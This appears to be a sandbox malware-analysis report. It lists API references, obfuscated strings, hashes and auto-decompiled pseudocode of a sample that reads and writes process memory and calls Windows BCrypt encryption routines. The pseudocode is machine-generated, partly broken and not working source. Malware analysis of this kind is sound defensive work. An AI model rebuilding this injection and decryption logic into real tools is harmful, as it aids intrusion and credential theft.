GetProcAddress.KERNEL32 ref: 00007FF7CEF22B33
GetProcAddress.KERNEL32 ref: 00007FF7CEF22B4E
GetProcAddress.KERNEL32 ref: 00007FF7CEF22B66
GetProcAddress.KERNEL32 ref: 00007FF7CEF22B81
GetProcAddress.KERNEL32 ref: 00007FF7CEF22B9C
GetProcAddress.KERNEL32 ref: 00007FF7CEF22BB7
GetProcAddress.KERNEL32 ref: 00007FF7CEF22BD2

Strings

y, xrefs: 00007FF7CEF22A55
BCryenAlthmPder, xrefs: 00007FF7CEF22B11
kernel32, xrefs: 00007FF7CEF22ADE
BCryptGetProperty, xrefs: 00007FF7CEF22B40
BCryptCloseAlgorithmProvider, xrefs: 00007FF7CEF22BC4
der, xrefs: 00007FF7CEF22AC4
BCryptDestroyKey, xrefs: 00007FF7CEF22BA9
BCryptSetProperty, xrefs: 00007FF7CEF22B25
gori, xrefs: 00007FF7CEF22AAF
BCrynerammeteyBCryenAlthmPder, xrefs: 00007FF7CEF22B5B
BCryptDecrypt, xrefs: 00007FF7CEF22B8E
LoadLibraryW, xrefs: 00007FF7CEF22AEB
t, xrefs: 00007FF7CEF22A5C
rovi, xrefs: 00007FF7CEF22ABD
BCryptEncrypt, xrefs: 00007FF7CEF22B73
thmP, xrefs: 00007FF7CEF22AB6
c, xrefs: 00007FF7CEF22A48

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: BCryenAlthmPder$BCrynerammeteyBCryenAlthmPder$BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGetProperty$BCryptSetProperty$LoadLibraryW$c$der$gori$kernel32$rovi$t$thmP$y
API String ID: 384173800-2409299874
Opcode ID: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
Instruction ID: 176c12ae69f235a0af55597715c9e9e5c139de873d40a1658fe8581579fbf8b5
Opcode Fuzzy Hash: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
Instruction Fuzzy Hash: FE51C471E49E038AFB90EF60E840178B7B4BB84778FA4013AD90D66668DF3CA544D724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF21170 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 139
libraryloaderinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32 ref: 00007FF7CEF211D9
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF211F6
GetProcAddress.KERNEL32 ref: 00007FF7CEF21206
WriteProcessMemory.KERNEL32 ref: 00007FF7CEF21248
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21257
GetProcAddress.KERNEL32 ref: 00007FF7CEF21267
LocalFree.KERNEL32 ref: 00007FF7CEF212B0
SetFilePointer.KERNEL32 ref: 00007FF7CEF212E9
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21303
GetProcAddress.KERNEL32 ref: 00007FF7CEF21313
ReadProcessMemory.KERNELBASE ref: 00007FF7CEF21353

Strings

LocalAlloc, xrefs: 00007FF7CEF2125D
kernel32, xrefs: 00007FF7CEF211EB, 00007FF7CEF21250, 00007FF7CEF212F8
WriteFile, xrefs: 00007FF7CEF211FC
ReadFile, xrefs: 00007FF7CEF21309

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$FileMemoryPointerProcess$FreeLocalReadWrite
String ID: LocalAlloc$ReadFile$WriteFile$kernel32
API String ID: 1117553398-482538141
Opcode ID: d16a015a5a2ce17a36118ae818b65e4e6dee09ec94e4f7e7aeb2ba8e0262f2a2
Instruction ID: 651c699b016f6e231725d78a37f7840dcbe72e8cb22358190b6d1bad5859d4ff
Opcode Fuzzy Hash: d16a015a5a2ce17a36118ae818b65e4e6dee09ec94e4f7e7aeb2ba8e0262f2a2
Instruction Fuzzy Hash: 9D514F76A08A4282EB90EF16E85057DB361FB88FE4B849031DA4E97B94CF3CE845C314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF2196C Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 389
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00007FF77FF7CEF2196C(void* __edx, long long __rcx, long long __rdx, long long __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t156;
				void* _t162;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t170;
				void* _t174;
				void* _t189;
				void* _t242;
				void* _t244;
				intOrPtr _t246;
				long long* _t250;
				void* _t258;
				WCHAR* _t285;
				long long* _t287;
				intOrPtr _t288;
				WCHAR* _t289;
				unsigned long long _t298;
				WCHAR* _t300;
				WCHAR* _t301;
				WCHAR* _t308;
				struct _EXCEPTION_RECORD _t310;
				long long _t312;
				long long _t313;
				signed long long _t366;
				struct _EXCEPTION_RECORD _t388;
				long long* _t391;
				signed int* _t392;
				intOrPtr _t394;
				void* _t396;
				void* _t399;
				WCHAR* _t401;
				void* _t402;
				void* _t404;
				void* _t405;
				struct HINSTANCE__* _t410;
				intOrPtr* _t412;
				WCHAR* _t414;
				signed int* _t415;
				void* _t419;
				void* _t422;
				long long* _t424;

				 *((long long*)(_t404 + 0x18)) = __r8;
				 *((long long*)(_t404 + 0x10)) = __rdx;
				_t402 = _t404 - 0xc8;
				_t405 = _t404 - 0x1c8;
				r13d = 0;
				 *((long long*)(_t405 + 0x58)) = __rcx;
				 *((long long*)(_t405 + 0x38)) = __rcx;
				 *(_t405 + 0x60) = _t414;
				 *((long long*)(_t405 + 0x68)) = 0xcef30618;
				 *(_t405 + 0x50) = _t414;
				 *(_t402 + 0x110) = _t414;
				_t10 =  &(_t414[0]); // 0x1
				_t246 =  *((intOrPtr*)(__rcx));
				if (_t246 == 0) goto 0xcef21e78;
				if (_t246 == 0) goto 0xcef21bd8;
				if (_t246 == 0) goto 0xcef21b3a;
				if (_t246 == 0) goto 0xcef219f5;
				goto 0xcef21f6e;
				if (E00007FF77FF7CEF21864(0xb, _t310, _t402 + 0x110, _t388, _t399, _t402, _t422, _t419) < 0) goto 0xcef21f6e;
				_t412 =  *(_t402 + 0x110);
				r14d = r13d;
				 *(_t405 + 0x48) = _t405 + 0x20;
				if ( *_t412 - r13d <= 0) goto 0xcef21f6e;
				_t415 = _t412 + 0x20;
				 *(_t402 + 0x110) = 0xffffffe0;
				if (_t10 == 0) goto 0xcef21f6e;
				_t285 =  *((intOrPtr*)(_t415 - 8));
				 *(_t405 + 0x30) = _t285;
				 *(_t405 + 0x40) =  *_t415;
				_t287 =  &(_t285[0xfffffffffffffff0]) + _t415;
				_t424 = _t287 + _t412 + 0x30;
				_t250 = _t424;
				if (_t250 == 0) goto 0xcef21b21;
				asm("repne scasb");
				_t320 =  !(0xffffffe0 - _t412 | 0xffffffff) - 1;
				 *((long long*)(_t402 + 0x128)) = 0xffffffe0;
				if (_t250 == 0) goto 0xcef21ae5;
				_t25 = _t320 + 2; // 0xffffffe1
				GetModuleHandleW(_t414);
				GetProcAddress(_t410);
				_t366 =  !(0xffffffe0 - _t412 | 0xffffffff) - 1 + _t25;
				 *_t287();
				_t391 = _t287;
				if (_t287 == 0) goto 0xcef21ae5;
				_t288 =  *((intOrPtr*)(_t402 + 0x128));
				if (_t288 == 0) goto 0xcef21ae5;
				 *((short*)(_t391 + _t366 * 2)) =  *((char*)(_t366 + _t424));
				if (_t366 + 1 - _t288 < 0) goto 0xcef21ad4;
				if (_t391 == 0) goto 0xcef21b1a;
				RtlInitUnicodeString(_t388);
				 *(_t405 + 0x44) =  *(_t405 + 0x44) & 0x00000000;
				_t156 =  *((intOrPtr*)(_t402 + 0x118))();
				LocalFree(_t399);
				r14d = r14d + 1;
				if (r14d -  *_t412 < 0) goto 0xcef21a44;
				goto 0xcef21f6e;
				_t289 = _t405 + 0x20;
				 *(_t405 + 0x48) = _t289;
				E00007FF77FF7CEF21624(4,  *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))), __r8);
				if (_t289 == 0) goto 0xcef21f6e;
				if ( *_t289 <= 0) goto 0xcef21bd1;
				_t40 =  &(_t289[6]); // 0xc
				_t392 = _t40;
				_t258 = _t156;
				if (_t258 == 0) goto 0xcef21bd1;
				 *(_t405 + 0x30) =  *((intOrPtr*)(_t392 - 8));
				 *(_t405 + 0x40) =  *_t392;
				r8d = _t392[3];
				_t408 = __r8 +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))) + 8));
				if (_t258 == 0) goto 0xcef21bc5;
				E00007FF77FF7CEF24104(0x5c, __r8 +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))) + 8)) + 4, __r8 +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t412 + 8)))) + 8)));
				RtlInitUnicodeString(_t310);
				E00007FF77FF7CEF21F84(0x5c, _t310, _t405 + 0x30, _t392, _t399);
				_t162 =  *_t424();
				if (1 -  *_t289 < 0) goto 0xcef21b6c;
				goto 0xcef21f6e;
				r8d = 0;
				 *(_t405 + 0x48) = _t405 + 0x20;
				_t163 = E00007FF77FF7CEF2214C(_t310, _t412, _t402 - 0x80, _t399); // executed
				if (_t163 == 0) goto 0xcef21f6e;
				 *(_t405 + 0x60) = _t402 + 0x80;
				r8d = 0x40;
				 *(_t405 + 0x50) =  *((intOrPtr*)(_t402 - 0x68));
				_t164 = E00007FF77FF7CEF21170(_t310, _t405 + 0x60, _t405 + 0x50, _t408); // executed
				if (_t164 == 0) goto 0xcef21f6e;
				_t312 =  *((intOrPtr*)(_t402 - 0x68)) + 0x10;
				goto 0xcef21d1e;
				if (_t162 == 0) goto 0xcef21d27;
				 *(_t405 + 0x50) =  *((intOrPtr*)(_t402 + 0xa0)) + 0xfffffff0;
				r8d = 0x68;
				 *(_t405 + 0x60) = _t402 - 0x20;
				_t165 = E00007FF77FF7CEF21170(_t312, _t405 + 0x60, _t405 + 0x50, _t408); // executed
				if (_t165 == 0) goto 0xcef21d16;
				asm("movups xmm0, [ebp+0x38]");
				 *(_t405 + 0x30) =  *((intOrPtr*)(_t402 + 0x10));
				asm("movdqu [esp+0x20], xmm0");
				 *(_t405 + 0x40) =  *(_t402 + 0x20);
				_t298 =  *(_t402 + 0x38) >> 0x10;
				GetModuleHandleW(_t401);
				GetProcAddress(??, ??);
				 *_t298();
				 *(_t405 + 0x28) = _t298;
				if (_t298 == 0) goto 0xcef21d16;
				r8d =  *(_t405 + 0x22) & 0x0000ffff;
				 *(_t405 + 0x60) = _t298;
				 *(_t405 + 0x50) =  *((intOrPtr*)(_t402 + 0x40));
				_t170 = E00007FF77FF7CEF21170(_t312, _t405 + 0x60, _t405 + 0x50, _t408); // executed
				if (_t170 == 0) goto 0xcef21d0b;
				E00007FF77FF7CEF21F84( *(_t402 + 0x20) & 0x0000ffff, _t312, _t405 + 0x30,  &(_t392[0x1b]), _t399); // executed
				_t242 =  *_t424();
				LocalFree(??);
				if ( *((intOrPtr*)(_t402 - 0x10)) + 0xfffffff0 != _t312) goto 0xcef21c43;
				if (_t242 == 0) goto 0xcef21f6e;
				r8d = 1;
				_t174 = E00007FF77FF7CEF2214C(_t312, _t412, _t405 + 0x70, _t399); // executed
				if (_t174 == 0) goto 0xcef21f6e;
				_t300 = _t402 + 0x50;
				 *(_t405 + 0x60) = _t300;
				r8d = 0x24;
				 *(_t405 + 0x50) = _t300;
				if (E00007FF77FF7CEF21170(_t312, _t405 + 0x60, _t405 + 0x50, _t408) == 0) goto 0xcef21f6e;
				_t301 = _t300 - 8;
				_t313 = _t312 + 0xc;
				goto 0xcef21e6a;
				if (_t242 == 0) goto 0xcef21f6b;
				r8d = 0x34;
				 *(_t405 + 0x60) = _t402 - 0x60;
				 *(_t405 + 0x50) = _t301;
				if (E00007FF77FF7CEF21170(_t313, _t405 + 0x60, _t405 + 0x50, _t408) == 0) goto 0xcef21e63;
				 *(_t405 + 0x30) = _t301;
				 *(_t405 + 0x40) =  *(_t402 - 0x40);
				 *((short*)(_t405 + 0x20)) =  *(_t402 - 0x34) & 0x0000ffff;
				_t182 =  *(_t402 - 0x32) & 0x0000ffff;
				 *(_t405 + 0x22) =  *(_t402 - 0x32) & 0x0000ffff;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *_t301();
				 *(_t405 + 0x28) = _t301;
				if (_t301 == 0) goto 0xcef21e63;
				r8d =  *(_t405 + 0x22) & 0x0000ffff;
				 *(_t405 + 0x60) = _t301;
				 *(_t405 + 0x50) = _t301;
				if (E00007FF77FF7CEF21170(_t313, _t405 + 0x60, _t405 + 0x50, _t408) == 0) goto 0xcef21e58;
				E00007FF77FF7CEF21F84( *(_t402 - 0x32) & 0x0000ffff, _t313, _t405 + 0x30,  &(_t392[0x1b]), _t399);
				_t189 =  *_t424();
				LocalFree(??);
				if (_t301 - 8 != _t313) goto 0xcef21d95;
				goto 0xcef21f6b;
				r8d = 0;
				if (E00007FF77FF7CEF2214C(_t313, _t412, _t402 - 0x80, _t399) == 0) goto 0xcef21ee1;
				_t394 =  *((intOrPtr*)( *((intOrPtr*)(_t402 - 0x68)) + 0x20));
				goto 0xcef21ed1;
				if (_t189 == 0) goto 0xcef21ede;
				 *(_t405 + 0x30) =  *((intOrPtr*)(_t394 + 0x30));
				 *(_t405 + 0x40) =  *(_t394 + 0x40);
				 *(_t405 + 0x48) = _t394 + 0x58;
				E00007FF77FF7CEF21F84(_t182, _t313, _t405 + 0x30, _t394, _t399);
				_t244 =  *_t424();
				_t396 =  *((intOrPtr*)(_t394 + 0x10)) - 0x10;
				if (_t396 !=  *((intOrPtr*)(_t402 - 0x68)) + 0x10) goto 0xcef21e95;
				_t308 = _t405 + 0x20;
				 *(_t405 + 0x48) = _t308;
				if (_t244 == 0) goto 0xcef21f6e;
				if (r13d < 0) goto 0xcef21f6e;
				r8d = 1;
				if (E00007FF77FF7CEF2214C(_t313, _t412, _t405 + 0x70, _t399) == 0) goto 0xcef21f6e;
				goto 0xcef21f5e;
				if (_t244 == 0) goto 0xcef21f6b;
				 *(_t405 + 0x30) = _t308;
				 *(_t405 + 0x40) =  *(_t396 + 0x20);
				 *((short*)(_t405 + 0x20)) =  *(_t396 + 0x2c) & 0x0000ffff;
				 *(_t405 + 0x22) =  *(_t396 + 0x2e) & 0x0000ffff;
				 *(_t405 + 0x28) = _t308;
				E00007FF77FF7CEF21F84(_t182, _t313, _t405 + 0x30, _t396, _t399);
				 *_t424();
				if (_t396 - 8 !=  &(_t308[8])) goto 0xcef21f13;
				return r13d;
			}

0x7ff7cef2196c
0x7ff7cef21971
0x7ff7cef21982
0x7ff7cef2198a
0x7ff7cef21991
0x7ff7cef21997
0x7ff7cef2199c
0x7ff7cef219b5
0x7ff7cef219ba
0x7ff7cef219bf
0x7ff7cef219c4
0x7ff7cef219cb
0x7ff7cef219cf
0x7ff7cef219d1
0x7ff7cef219d9
0x7ff7cef219e1
0x7ff7cef219e9
0x7ff7cef219f0
0x7ff7cef21a0a
0x7ff7cef21a10
0x7ff7cef21a1c
0x7ff7cef21a1f
0x7ff7cef21a28
0x7ff7cef21a35
0x7ff7cef21a3d
0x7ff7cef21a46
0x7ff7cef21a4c
0x7ff7cef21a50
0x7ff7cef21a59
0x7ff7cef21a65
0x7ff7cef21a68
0x7ff7cef21a6d
0x7ff7cef21a70
0x7ff7cef21a7f
0x7ff7cef21a86
0x7ff7cef21a89
0x7ff7cef21a90
0x7ff7cef21a92
0x7ff7cef21a9e
0x7ff7cef21aae
0x7ff7cef21ab4
0x7ff7cef21abc
0x7ff7cef21abe
0x7ff7cef21ac4
0x7ff7cef21ac6
0x7ff7cef21ad2
0x7ff7cef21ad9
0x7ff7cef21ae3
0x7ff7cef21ae8
0x7ff7cef21af2
0x7ff7cef21aff
0x7ff7cef21b09
0x7ff7cef21b14
0x7ff7cef21b21
0x7ff7cef21b2f
0x7ff7cef21b35
0x7ff7cef21b3f
0x7ff7cef21b49
0x7ff7cef21b51
0x7ff7cef21b5c
0x7ff7cef21b66
0x7ff7cef21b68
0x7ff7cef21b68
0x7ff7cef21b6c
0x7ff7cef21b6e
0x7ff7cef21b74
0x7ff7cef21b7b
0x7ff7cef21b84
0x7ff7cef21b8b
0x7ff7cef21b8f
0x7ff7cef21b9a
0x7ff7cef21ba8
0x7ff7cef21bb3
0x7ff7cef21bc0
0x7ff7cef21bcf
0x7ff7cef21bd3
0x7ff7cef21be1
0x7ff7cef21be7
0x7ff7cef21bec
0x7ff7cef21bf3
0x7ff7cef21c0a
0x7ff7cef21c13
0x7ff7cef21c19
0x7ff7cef21c1e
0x7ff7cef21c25
0x7ff7cef21c3a
0x7ff7cef21c3e
0x7ff7cef21c45
0x7ff7cef21c4f
0x7ff7cef21c5e
0x7ff7cef21c64
0x7ff7cef21c69
0x7ff7cef21c72
0x7ff7cef21c7c
0x7ff7cef21c87
0x7ff7cef21c8f
0x7ff7cef21c95
0x7ff7cef21c9d
0x7ff7cef21ca4
0x7ff7cef21cb4
0x7ff7cef21cc1
0x7ff7cef21cc3
0x7ff7cef21ccb
0x7ff7cef21ccd
0x7ff7cef21cd3
0x7ff7cef21ce6
0x7ff7cef21ceb
0x7ff7cef21cf2
0x7ff7cef21cf9
0x7ff7cef21d09
0x7ff7cef21d10
0x7ff7cef21d21
0x7ff7cef21d2c
0x7ff7cef21d37
0x7ff7cef21d40
0x7ff7cef21d47
0x7ff7cef21d4d
0x7ff7cef21d5b
0x7ff7cef21d64
0x7ff7cef21d6a
0x7ff7cef21d7b
0x7ff7cef21d88
0x7ff7cef21d8c
0x7ff7cef21d90
0x7ff7cef21d97
0x7ff7cef21da6
0x7ff7cef21dac
0x7ff7cef21db6
0x7ff7cef21dc2
0x7ff7cef21dd2
0x7ff7cef21dda
0x7ff7cef21de2
0x7ff7cef21de7
0x7ff7cef21deb
0x7ff7cef21df2
0x7ff7cef21e02
0x7ff7cef21e0f
0x7ff7cef21e11
0x7ff7cef21e19
0x7ff7cef21e1b
0x7ff7cef21e21
0x7ff7cef21e33
0x7ff7cef21e3f
0x7ff7cef21e46
0x7ff7cef21e53
0x7ff7cef21e5d
0x7ff7cef21e6d
0x7ff7cef21e73
0x7ff7cef21e7c
0x7ff7cef21e89
0x7ff7cef21e8f
0x7ff7cef21e93
0x7ff7cef21e97
0x7ff7cef21ea2
0x7ff7cef21eaa
0x7ff7cef21eb2
0x7ff7cef21eb7
0x7ff7cef21ecb
0x7ff7cef21ed1
0x7ff7cef21edc
0x7ff7cef21ee1
0x7ff7cef21ee6
0x7ff7cef21eed
0x7ff7cef21ef1
0x7ff7cef21ef8
0x7ff7cef21f08
0x7ff7cef21f11
0x7ff7cef21f15
0x7ff7cef21f1f
0x7ff7cef21f27
0x7ff7cef21f2f
0x7ff7cef21f38
0x7ff7cef21f40
0x7ff7cef21f45
0x7ff7cef21f52
0x7ff7cef21f69
0x7ff7cef21f83

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21A9E
GetProcAddress.KERNEL32 ref: 00007FF7CEF21AAE
RtlInitUnicodeString.NTDLL ref: 00007FF7CEF21AF2
LocalFree.KERNEL32 ref: 00007FF7CEF21B14
RtlInitUnicodeString.NTDLL ref: 00007FF7CEF21BA8

Strings

LocalAlloc, xrefs: 00007FF7CEF21AA4, 00007FF7CEF21CAA, 00007FF7CEF21DF8
kernel32, xrefs: 00007FF7CEF21A97, 00007FF7CEF21C80, 00007FF7CEF21DCB

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
String ID: LocalAlloc$kernel32
API String ID: 979628613-3502785670
Opcode ID: 2e85f13aae667f3260406cb317723514b5c67926e5243f8a55408fdb5d2d8e11
Instruction ID: a40a02fa14b7011ef87375882f5a70e7a44e18b8d9076926859e99a380a1f394
Opcode Fuzzy Hash: 2e85f13aae667f3260406cb317723514b5c67926e5243f8a55408fdb5d2d8e11
Instruction Fuzzy Hash: 90025137A09B8686EBA0DF15E4406AEB3A4FB88764F900131EE5D57B99EF3CE504C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF22CE8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF22D8D
GetProcAddress.KERNEL32 ref: 00007FF7CEF22D9D
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF22E46
GetProcAddress.KERNEL32 ref: 00007FF7CEF22E56

Strings

LocalAlloc, xrefs: 00007FF7CEF22D93, 00007FF7CEF22E4C
kernel32, xrefs: 00007FF7CEF22D86, 00007FF7CEF22E3F
3DES, xrefs: 00007FF7CEF22CF2
ObjectLength, xrefs: 00007FF7CEF22D5E, 00007FF7CEF22E1B
AES, xrefs: 00007FF7CEF22DAC
ChainingModeCFB, xrefs: 00007FF7CEF22DE3
ChainingMode, xrefs: 00007FF7CEF22D29, 00007FF7CEF22DEA
ChainingModeCBC, xrefs: 00007FF7CEF22D22

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
API String ID: 1646373207-1761306045
Opcode ID: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
Instruction ID: bcde4fc9fa0bab66f8898f5627a7638c7841b4b32ba665d52c7bc8090dda3dd8
Opcode Fuzzy Hash: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
Instruction Fuzzy Hash: AE41E131A09E4382FB90AF15F854AA5A361BF847B9FD11032CA0DA7664EF3DE549C724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF236D8 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 222
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00007FF77FF7CEF236D8(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9) {
				void* __rsi;
				void* __rbp;
				void* _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				long long _t171;
				long long _t172;
				signed long long _t173;
				signed long long _t176;
				long long _t177;
				long long _t178;
				long long _t179;
				signed long long _t185;
				intOrPtr* _t204;
				signed long long _t219;
				intOrPtr _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t238;
				void* _t240;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				long long _t248;
				long long _t250;
				struct HINSTANCE__* _t252;
				WCHAR* _t255;
				void* _t256;

				_t248 = __r8;
				 *((long long*)(_t245 + 8)) = __rbx;
				_t243 = _t245 - 0x37;
				_t246 = _t245 - 0xf0;
				 *(_t243 - 0x79) =  *(_t243 - 0x79) & 0x00000000;
				_t5 = _t243 + 0x77; // 0x7ff7cef22568
				_t256 = __rcx;
				 *(_t246 + 0x20) = _t5;
				 *((intOrPtr*)(_t243 + 0x77)) = 1;
				 *((long long*)(_t246 + 0x28)) = 0xcef30618;
				 *((long long*)(_t243 - 0x71)) = 0xcef30618;
				_t99 = E00007FF77FF7CEF2326C(_t98, 1, __r9); // executed
				r12d = _t99;
				 *((intOrPtr*)(_t243 + 0x7f)) = _t99;
				if (_t99 < 0) goto 0xcef23a63;
				 *((long long*)(_t243 - 0x49)) = 0xcef30688;
				_t171 =  *0xcef30920; // 0x7ff7cef2c018
				 *((long long*)(_t243 - 0x41)) = _t171;
				_t100 =  *0xcef30698; // 0x2ee
				if (_t100 - 0xbb8 >= 0) goto 0xcef2375c;
				goto 0xcef237a3;
				if (_t100 - 0x1388 >= 0) goto 0xcef2376c;
				goto 0xcef237a3;
				if (_t100 - 0x1b58 >= 0) goto 0xcef2377c;
				goto 0xcef237a3;
				if (_t100 - 0x1f40 >= 0) goto 0xcef2378c;
				goto 0xcef237a3;
				_t194 =  >=  ? 0xcef2bfc0 : 0xcef2bf90;
				if (_t100 + 0xffffe4a8 - 0x95f > 0) goto 0xcef237bf;
				if ( *0xcef2f054 - 0x53480000 <= 0) goto 0xcef237bf;
				_t195 = ( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30;
				_t172 =  *0xcef30688; // 0x0
				 *((long long*)(_t246 + 0x38)) = _t172;
				_t173 =  *0xcef306b0; // 0x0
				 *(_t246 + 0x30) = _t173;
				if (_t173 == 0) goto 0xcef237f1;
				r8d = 4;
				E00007FF77FF7CEF21170(( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30, _t246 + 0x20, _t246 + 0x30, _t248);
				if ( *((intOrPtr*)(_t243 + 0x77)) <= 0) goto 0xcef23a63;
				 *((long long*)(_t246 + 0x28)) = 0xcef30618;
				 *(_t246 + 0x30) = (_t173 << 4) +  *0xcef306a8;
				_t20 = _t243 + 0x17; // 0x7ff7cef22508
				_t176 = _t20;
				 *(_t246 + 0x20) = _t176;
				GetModuleHandleW(_t255);
				GetProcAddress(_t252);
				 *_t176();
				 *(_t243 - 0x79) = _t176;
				if (_t176 == 0) goto 0xcef23a54;
				r8d = 8;
				if (E00007FF77FF7CEF21170(( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30, _t246 + 0x20, _t246 + 0x30, _t248) == 0) goto 0xcef23a4a;
				_t177 =  *((intOrPtr*)(_t246 + 0x38));
				 *((long long*)(_t246 + 0x28)) = _t177;
				goto 0xcef23a3a;
				if (1 == 0) goto 0xcef23a4a;
				_t29 = _t243 - 0x79; // 0x7ff7cef22478
				_t204 = _t29;
				if (E00007FF77FF7CEF21170(( >=  ? 0xcef2bfc0 : 0xcef2bf90) + 0x30, _t204, _t246 + 0x20,  *_t195) == 0) goto 0xcef23a4a;
				_t30 = _t243 - 0x79; // 0x45158d480000e654
				_t250 =  *_t30;
				_t178 = _t177 + _t250;
				 *((long long*)(_t243 - 0x39)) = _t178;
				 *((intOrPtr*)(_t243 - 0x21)) =  *((intOrPtr*)(_t178 + _t250));
				_t179 = _t178 + _t250;
				 *((intOrPtr*)(_t243 - 0x1d)) =  *((intOrPtr*)(_t178 + _t250));
				 *((long long*)(_t243 - 0x29)) = _t179;
				 *((long long*)(_t243 - 0x31)) = _t204 + _t250;
				 *((long long*)(_t243 - 0x19)) =  *((intOrPtr*)(_t179 + _t250));
				 *(_t243 - 0x11) =  *((intOrPtr*)(_t179 + _t250));
				 *((long long*)(_t243 - 9)) =  *((intOrPtr*)(_t179 + _t250));
				 *((long long*)(_t243 - 1)) =  *((intOrPtr*)(_t179 + _t250));
				_t231 =  *0xcef30688; // 0x0
				 *((long long*)(_t243 + 7)) = _t179 + _t250;
				E00007FF77FF7CEF2224C(_t195, _t204 + _t250, _t231, _t240, _t238);
				_t232 =  *0xcef30688; // 0x0
				_t57 = _t243 - 0x29; // 0x244c8d48c1420f48
